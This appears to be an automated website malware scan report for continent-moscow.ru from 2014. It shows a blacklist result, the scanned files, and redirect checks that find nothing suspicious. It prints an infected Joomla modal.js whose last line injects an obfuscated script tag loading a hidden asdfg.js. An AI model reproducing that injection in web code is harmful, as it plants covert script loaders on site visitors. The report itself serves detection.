Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=continent-moscow.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://continent-moscow.ru/ | 200 OK Content-Length: 29379 Content-Type: text/html | clean |
http://continent-moscow.ru/media/system/js/modal.js | 200 OK Content-Length: 10677 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SqueezeBox = { presets: { size: {x: 600, y: 450}, sizeLoading: {x: 200, y: 150}, marginInner: {x: 20, y: 20}, marginImage: {x: 150, y: 200}, handler: false, adopt: null, closeWithOverlay: true, zIndex: 65555, overlayOpacity: 0.7, classWindow: '', classOverlay: '', disableFx: false, onOpen: Class.empty, onClose: Class.empty, onUpdate: Class.empty, onResize: Class.empty, onMove: Class.emp 'frameBorder': 0, 'width': this.options.size.x, 'height': this.options.size.y }); }, 'string': function(str) { return str; } }, extend: $extend }; SqueezeBox.extend(SqueezeBox, Events.prototype); SqueezeBox.extend(SqueezeBox, Options.prototype); SqueezeBox.extend(SqueezeBox, Chain.prototype); ;document.write("<scr"+"ipt src='/administrator/language/en-GB/asdfg.js'><"+"/script>"); Antivirus reports:
| ||
http://continent-moscow.ru//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Not Found Content-Length: 338 Content-Type: text/html | clean |
http://continent-moscow.ru/test404page.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
http://continent-moscow.ru/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 347 Content-Type: application/x-javascript | clean |
http://continent-moscow.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 6820 Content-Type: application/x-javascript | clean |
http://continent-moscow.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://continent-moscow.ru/templates/jaw047/script.js | 200 OK Content-Length: 8734 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: continent-moscow.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 May 2014 23:25:19 GMT
Server: nginx/1.4.3
Content-Type: text/html
Set-Cookie: dsgfdg34g=1; expires=Wed, 04-Jun-2014 23:28:18 GMT
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: continent-moscow.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 May 2014 23:25:19 GMT
Server: nginx/1.4.3
Content-Type: text/html
Set-Cookie: dsgfdg34g=1; expires=Wed, 04-Jun-2014 23:28:18 GMT
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: continent-moscow.ru
Referer: http://www.google.com/search?q=continent-moscow.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: continent-moscow.ru
Referer: http://www.google.com/search?q=continent-moscow.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.